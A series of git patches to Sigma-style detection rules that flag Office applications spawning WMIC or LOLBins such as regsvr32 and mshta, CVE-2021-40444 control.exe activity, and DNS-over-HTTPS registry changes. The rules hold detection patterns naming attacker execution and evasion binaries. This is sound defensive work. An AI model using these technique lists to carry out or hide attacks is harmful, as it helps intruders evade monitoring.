b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -11,37 +11,33 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows - service: security category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: security - EventID: 4688 - selection2: ProcessCommandLine: - '*regsvr32*' - '*rundll32*' - '*msiexec*' - '*mshta*' - '*verclsid*' - selection3: - - ProcessName: '*\wbem\WMIC.exe' + selection2: + - Image: '*\wbem\WMIC.exe' - ProcessCommandLine: '*wmic *' - selection4: - ParentProcessName|endswith: + selection3: + ParentImage|endswith: - winword.exe - excel.exe - powerpnt.exe - selection5: + selection4: processCommandLine|contains|all: - 'process' - 'create' - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 + condition: selection1 AND selection2 AND selection3 AND selection4 falsepositives: - Unknown level: high From 3b2ebe1580e639013baa2a87b222a2851fb2d553 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:12:02 -0600 Subject: [PATCH 0778/1367] Completed changes Removed : unnecessary event ID --- ...ice_Applications_Spawning_WMI_command-line.yml | 15 +++++---------- 1 file changed, 5 insertions(+), 10 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 57d0d164..2f5a5971 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -11,26 +11,21 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: windows - service: security category: process_creation detection: #useful_information: Add more office applications to the rule logic of choice selection1: - - EventLog: security - selection2: - - EventID: 4688 - selection3: - - ProcessName: '*\wbem\WMIC.exe' + - Image: '*\wbem\WMIC.exe' - ProcessCommandLine: '*wmic *' - selection4: - - ParentProcessName: + selection2: + - ParentImage: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 AND selection3 AND selection4 + condition: selection1 AND selection2 falsepositives: - Unknown level: high From 75a6e5c95b57fd3a669309549173b16d072ef64d Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:14:06 -0600 Subject: [PATCH 0779/1367] Completed Changes as per comments Removed : unnecessary event ID --- ..._Process Create_command_execution_by_Office_Applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index 4e96dc74..5f9e1589 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -11,7 +11,7 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: EndPoint Detection Logs category: process_creation From bd4d21c41c093294b3225b5108b5af8589de4c85 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:17:12 -0600 Subject: [PATCH 0780/1367] Completed changes based on comments Removed : unnecessary event ID --- ..._creation_by_Office_applications_using_file_extentions.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 6a568b55..dcfc0694 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -11,10 +11,9 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows - service: Sysmon category: process_creation detection: #useful_information: Please add more file extentions and magic bytes to the logic of your choice. @@ -22,7 +21,6 @@ detection: EventType: - FileCreate - FileRename - EventID: 11 selection2: Image|endswith: - 'winword.exe' From 8dc1b03fef3f481d2497ae4ec64b566a97078afa Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:19:43 -0600 Subject: [PATCH 0781/1367] Completed Changes Based on Comments Removed : unnecessary event ID --- ...r_LOLBins_Process_Creations_by_Office_applications.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index bf8dbf9f..896585ff 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -11,27 +11,25 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventID: 1 - selection2: Image|endswith: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' - selection3: + selection2: ParentImage|endswith: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 AND selection3 + condition: selection1 AND selection2 falsepositives: - Unknown level: high From 13e626205547de12bc9f59c5786f78b6d9f38e41 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:20:51 -0600 Subject: [PATCH 0782/1367] Completed Changes Based on Comments Removed : unnecessary event ID --- ...ins_process_creations_with_Wmiprvse_parent_process.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 5423077e..cf7a2801 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -11,25 +11,23 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventID: 1 - selection2: Image|endswith: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' - selection3: + selection2: ParentImage|endswith: - "\\wbem\\WmiPrvSE.exe" - condition: selection1 AND selection2 AND selection3 + condition: selection1 AND selection2 falsepositives: - FPs are possible here, but some LOLBins weren't excluded for obvious reasons. level: high From 8d47f9531be02d712eaa6d3f0b52aa47dc144dde Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:22:01 -0600 Subject: [PATCH 0783/1367] Completed Changes Based on Comments Removed : unnecessary event ID --- ...ns_from_proxy_executing_regsvr32_with_payload.yml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index 6ee87b6c..ecb11a21 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -11,37 +11,35 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventID: 1 - selection2: - Image: '*\wbem\WMIC.exe' - ProcessCommandLine: '*wmic *' - OriginalFileName: 'wmic.exe' - Description: 'WMI Commandline Utility' - selection3: + selection2: CommandLine|contains: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' - selection4: + selection3: ParentImage|endswith: - winword.exe - excel.exe - powerpnt.exe - selection5: + selection4: processCommandLine|contains|all: - 'process' - 'create' - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 + condition: selection1 AND selection2 AND selection3 AND selection4 falsepositives: - Unknown level: high From 4130ceb208f34b2445641a95f8049a090a5af9c9 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:25:52 -0600 Subject: [PATCH 0784/1367] Completed Changes Based on Comments Removed : unnecessary event ID --- ...ation_by_Office_applications_using_file_extentions.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 0193aefe..4a12d0f7 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -11,20 +11,18 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows category: process_creation detection: #useful_information: Please add more file extentions to the logic of your choice. selection1: - EventID: 11 - selection2: Image|endswith: - 'winword.exe' - 'excel.exe' - 'powerpnt.exe' - selection3: + selection2: TargetFileName|endswith: - ".exe" - ".dll" @@ -36,7 +34,7 @@ detection: - ".bat" - ".scr" - ".proj" - condition: selection1 AND selection2 AND selection3 + condition: selection1 AND selection2 falsepositives: - Unknown level: high From e3b376e94596d47855683590aac6822ea2fdd5ba Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:26:42 -0600 Subject: [PATCH 0785/1367] Completed Changes Based on Comments Removed : unnecessary event ID --- .../Office_Applications_Spawning_WMI_command-line.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index 74777966..c38173bf 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -11,25 +11,23 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: windows category: process_creation detection: #useful_information: Add more office applications to the rule logic of choice selection1: - EventID: 1 - selection2: - Image: '\wbem\WMIC.exe' - CommandLine: '*wmic *' - OriginalFileName: 'wmic.exe' - Description: 'WMI Commandline Utility' - selection3: + selection2: - ParentPrcessName|endswith: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 AND selection3 + condition: selection1 AND selection2 falsepositives: - Unknown level: high From c9b4f5d3261e41e1107f1bcc6169174dff63f893 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 8 Sep 2021 16:49:49 +0200 Subject: [PATCH 0786/1367] CVE-2021-40444 --- .../win_susp_control_cve_2021_40444.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_control_cve_2021_40444.yml diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml new file mode 100644 index 00000000..03b75f38 --- /dev/null +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -0,0 +1,30 @@ +title: CVE-2021-40444 Process Pattern +id: 894397c6-da03-425c-a589-3d09e7d1f750 +description: Detects a suspicious process pattern found in CVE-2021-40444 exploitation +status: experimental +references: + - https://twitter.com/neonprimetime/status/1435584010202255375 + - https://www.joesandbox.com/analysis/476188/1/iochtml +author: '@neonprimetime, Florian Roth' +date: 2021/09/08 +tags: + - cve.2021.40444 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\control.exe' + CommandLine|contains: + - '\AppData\' + - '\Temp\' + - '\ProgramData\' + - '\Users\Public\' + ParentImage|endswith: + - '\winword.exe' + - '\powerpnt.exe' + - '\excel.exe' + condition: selection +falsepositives: + - Unknown +level: high From e388bc6bfa9734683830c2531443ea591c8f937a Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 8 Sep 2021 16:56:04 +0200 Subject: [PATCH 0787/1367] remove unsupported tag --- .../process_creation/win_susp_control_cve_2021_40444.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 03b75f38..8a284b08 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -7,8 +7,6 @@ references: - https://www.joesandbox.com/analysis/476188/1/iochtml author: '@neonprimetime, Florian Roth' date: 2021/09/08 -tags: - - cve.2021.40444 logsource: category: process_creation product: windows From 847b8f49b4ca8295eb58b02ef6d9655d13e6b411 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Wed, 8 Sep 2021 22:22:53 +0700 Subject: [PATCH 0788/1367] Update sysmon_dns_over_https_enabled.yml Remove HKEY_LOCAL_MACHINE\ and revise Firefox object --- .../registry_event/sysmon_dns_over_https_enabled.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index c7687eed..04f3a0b3 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -1,6 +1,7 @@ title: DNS-over-HTTPS Enabled by Registry id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 date: 2021/07/22 +modified: 2021/09/08 description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. author: Austin Songer status: experimental @@ -8,6 +9,7 @@ references: - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - https://github.com/elastic/detection-rules/issues/1371 - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode + - https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS tags: - attack.defense_evasion - attack.t1140 @@ -17,13 +19,13 @@ logsource: category: registry_event detection: selection1: - TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' + TargetObject: '\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' Details: 'DWORD (1)' selection2: - TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + TargetObject: 'E\SOFTWARE\Google\Chrome\DnsOverHttpsMode' Details: 'DWORD (secure)' selection3: - TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' + TargetObject: '\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS\Enabled' Details: 'DWORD (1)' condition: selection1 or selection2 or selection3 falsepositives: From c633e825e071e9c53d7cb2644a0c105c134f60aa Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Wed, 8 Sep 2021 22:23:51 +0700 Subject: [PATCH 0789/1367] Update sysmon_dns_over_https_enabled.yml --- rules/windows/registry_event/sysmon_dns_over_https_enabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index 04f3a0b3..695cc190 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -22,7 +22,7 @@ detection: TargetObject: '\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' Details: 'DWORD (1)' selection2: - TargetObject: 'E\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + TargetObject: '\SOFTWARE\Google\Chrome\DnsOverHttpsMode' Details: 'DWORD (secure)' selection3: TargetObject: '\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS\Enabled' From b1540d65b9b5c6cb05f1a2ea7d0dfb177028c9f6 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 8 Sep 2021 17:35:50 +0200 Subject: [PATCH 0790/1367] refactor: simplified rule --- .../process_creation/win_susp_control_cve_2021_40444.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 8a284b08..b21c7012 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -13,11 +13,6 @@ logsource: detection: selection: Image|endswith: '\control.exe' - CommandLine|contains: - - '\AppData\' - - '\Temp\' - - '\ProgramData\' - - '\Users\Public\' ParentImage|endswith: - '\winword.exe' - '\powerpnt.exe' From af8bf06b3015f031df6f3cd28d5c8e9aa91fc709 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 8 Sep 2021 20:14:49 +0200 Subject: [PATCH 0791/1367] add missing tags --- .../windows/process_creation/process_mailboxexport_share.yml | 3 +++ rules/windows/process_creation/win_apt_hafnium.yml | 4 ++++ rules/windows/process_creation/win_malware_conti_7zip.yml | 3 +++ rules/windows/process_creation/win_malware_formbook.yml | 3 +++ rules/windows/process_creation/win_reg_add_run_key.yml | 3 +++ .../windows/process_creation/win_susp_psexex_paexec_flags.yml | 3 +++ rules/windows/process_creation/win_susp_renamed_debugview.yml | 3 +++ rules/windows/process_creation/win_susp_renamed_paexec.yml | 3 +++ .../windows/process_creation/win_susp_rundll32_no_params.yml | 3 +++ rules/windows/process_creation/win_susp_service_dir.yml | 3 +++ rules/windows/process_creation/win_susp_splwow64.yml | 3 +++ rules/windows/process_creation/win_susp_vbscript_unc2452.yml | 4 ++++ 12 files changed, 38 insertions(+) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml index da6aba61..aaa722fa 100644 --- a/rules/windows/process_creation/process_mailboxexport_share.yml +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -24,3 +24,6 @@ level: critical fields: - CommandLine - ParentCommandLine +tags: + attack.collection + attack.t1114 \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_hafnium.yml b/rules/windows/process_creation/win_apt_hafnium.yml index 14772b4b..30c41f2b 100644 --- a/rules/windows/process_creation/win_apt_hafnium.yml +++ b/rules/windows/process_creation/win_apt_hafnium.yml @@ -70,3 +70,7 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.persistence + - attack.t1546 + - attack.t1053 \ No newline at end of file diff --git a/rules/windows/process_creation/win_malware_conti_7zip.yml b/rules/windows/process_creation/win_malware_conti_7zip.yml index 15198fae..aff67440 100644 --- a/rules/windows/process_creation/win_malware_conti_7zip.yml +++ b/rules/windows/process_creation/win_malware_conti_7zip.yml @@ -19,3 +19,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.collection + - attack.t1560 \ No newline at end of file diff --git a/rules/windows/process_creation/win_malware_formbook.yml b/rules/windows/process_creation/win_malware_formbook.yml index d30851ea..fd1207ca 100644 --- a/rules/windows/process_creation/win_malware_formbook.yml +++ b/rules/windows/process_creation/win_malware_formbook.yml @@ -49,3 +49,6 @@ fields: falsepositives: - Unknown level: critical +tags: + - attack.develop_capabilities + - attack.t1587.001 \ No newline at end of file diff --git a/rules/windows/process_creation/win_reg_add_run_key.yml b/rules/windows/process_creation/win_reg_add_run_key.yml index 0cd6b854..ef9ededa 100644 --- a/rules/windows/process_creation/win_reg_add_run_key.yml +++ b/rules/windows/process_creation/win_reg_add_run_key.yml @@ -20,3 +20,6 @@ detection: falsepositives: - Unknown level: medium +tags: + - attack.persistence + - attack.t1547.001 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_psexex_paexec_flags.yml b/rules/windows/process_creation/win_susp_psexex_paexec_flags.yml index 404f2d7a..51926aa0 100644 --- a/rules/windows/process_creation/win_susp_psexex_paexec_flags.yml +++ b/rules/windows/process_creation/win_susp_psexex_paexec_flags.yml @@ -32,3 +32,6 @@ falsepositives: - Weird admins that rename their tools - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing level: high +tags: + - attack.develop_capabilities + - attack.t1587.001 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_renamed_debugview.yml b/rules/windows/process_creation/win_susp_renamed_debugview.yml index f421c1cd..54c431bb 100644 --- a/rules/windows/process_creation/win_susp_renamed_debugview.yml +++ b/rules/windows/process_creation/win_susp_renamed_debugview.yml @@ -21,3 +21,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.lateral_movement + - attack.discovery \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_renamed_paexec.yml b/rules/windows/process_creation/win_susp_renamed_paexec.yml index 7c51c620..06c4680f 100644 --- a/rules/windows/process_creation/win_susp_renamed_paexec.yml +++ b/rules/windows/process_creation/win_susp_renamed_paexec.yml @@ -24,3 +24,6 @@ falsepositives: - Weird admins that rename their tools - Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing level: high +tags: + - attack.defense_evasion + - attack.t1202 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_rundll32_no_params.yml b/rules/windows/process_creation/win_susp_rundll32_no_params.yml index b45e3b4e..b1a6486a 100644 --- a/rules/windows/process_creation/win_susp_rundll32_no_params.yml +++ b/rules/windows/process_creation/win_susp_rundll32_no_params.yml @@ -25,3 +25,6 @@ fields: falsepositives: - Possible but rare level: high +tags: + - attack.defense_evasion + - attack.t1202 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_service_dir.yml b/rules/windows/process_creation/win_susp_service_dir.yml index bc04c1e4..f435334e 100644 --- a/rules/windows/process_creation/win_susp_service_dir.yml +++ b/rules/windows/process_creation/win_susp_service_dir.yml @@ -30,3 +30,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.defense_evasion + - attack.t1202 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_splwow64.yml b/rules/windows/process_creation/win_susp_splwow64.yml index 38c4a4da..d18e5e6a 100644 --- a/rules/windows/process_creation/win_susp_splwow64.yml +++ b/rules/windows/process_creation/win_susp_splwow64.yml @@ -18,3 +18,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.defense_evasion + - attack.t1202 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_vbscript_unc2452.yml b/rules/windows/process_creation/win_susp_vbscript_unc2452.yml index d224ddbf..9e67d2a7 100644 --- a/rules/windows/process_creation/win_susp_vbscript_unc2452.yml +++ b/rules/windows/process_creation/win_susp_vbscript_unc2452.yml @@ -24,3 +24,7 @@ detection: falsepositives: - Unknown level: high +tags: +tags: + - attack.persistence + - attack.t1547.001 \ No newline at end of file From deb0ddfe096a8ec091a29dc84bae450bc11466f4 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 8 Sep 2021 20:16:53 +0200 Subject: [PATCH 0792/1367] fix duplicate tags --- rules/windows/process_creation/win_susp_vbscript_unc2452.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_vbscript_unc2452.yml b/rules/windows/process_creation/win_susp_vbscript_unc2452.yml index 9e67d2a7..f440ffb2 100644 --- a/rules/windows/process_creation/win_susp_vbscript_unc2452.yml +++ b/rules/windows/process_creation/win_susp_vbscript_unc2452.yml @@ -24,7 +24,6 @@ detection: falsepositives: - Unknown level: high -tags: tags: - attack.persistence - attack.t1547.001 \ No newline at end of file From 8eb527d04285d865ad4aebae38fb121e83d2df91 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 8 Sep 2021 20:21:02 +0200 Subject: [PATCH 0793/1367] Update process_mailboxexport_share.yml --- .../windows/process_creation/process_mailboxexport_share.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml index aaa722fa..d0d62110 100644 --- a/rules/windows/process_creation/process_mailboxexport_share.yml +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -25,5 +25,5 @@ fields: - CommandLine - ParentCommandLine tags: - attack.collection - attack.t1114 \ No newline at end of file + - attack.collection + - attack.t1114 \ No newline at end of file From 36ed5ee9d4d45159af21a8a89575e699c0e9b2c1 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Thu, 9 Sep 2021 08:04:54 +0700 Subject: [PATCH 0794/1367] Update sysmon_dns_over_https_enabled.yml --- .../sysmon_dns_over_https_enabled.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index 695cc190..c5138d2b 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -18,16 +18,16 @@ logsource: product: windows category: registry_event detection: - selection1: - TargetObject: '\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' + selection_edge: + TargetObject|endswith: '\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' Details: 'DWORD (1)' - selection2: - TargetObject: '\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + selection_chrome: + TargetObject|endswith: '\SOFTWARE\Google\Chrome\DnsOverHttpsMode' Details: 'DWORD (secure)' - selection3: - TargetObject: '\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS\Enabled' + selection_firefox: + TargetObject|endswith: '\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS\Enabled' Details: 'DWORD (1)' - condition: selection1 or selection2 or selection3 + condition: selection_edge or selection_chrome or selection_firefox falsepositives: - Unlikely level: medium From 6ddc83901b53b00f9126d8c9284efc775a560d81 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 20:38:07 -0600 Subject: [PATCH 0795/1367] Changed Category Category Changed from process_creation to file_event --- ...es_creation_by_Office_applications_using_file_extentions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 4a12d0f7..55229ae7 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -14,7 +14,7 @@ status: experimental Date: 2021/08/23 logsource: product: Windows - category: process_creation + category: file_event detection: #useful_information: Please add more file extentions to the logic of your choice. selection1: From 1f577174f96b1481cae7dbbaa35f9e308ef0bb94 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:06:41 -0600 Subject: [PATCH 0796/1367] Changed endswith condition removed double // from "\wbem\WmiPrvSE.exe" --- ...r_LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 1301950c..5404a30d 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -26,7 +26,7 @@ detection: - 'verclsid' selection2: ParentImage|endswith: - - "\\wbem\\WmiPrvSE.exe" + - "\wbem\WmiPrvSE.exe" condition: selection1 AND selection2 falsepositives: - Unknown From a3236e62a26bde38a346a5a3b13e3ef3cae1b2ed Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:10:47 -0600 Subject: [PATCH 0797/1367] Changed selection2 conditions replaced *\wbem\WMIC.exe with Image|endswith: '\wbem\WMIC.exe' and ProcessCommandLine: *wmic * with ProcessCommandLine|contains: 'wmic ' --- ...Application_from_proxy executing_regsvr32_with_payload.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git 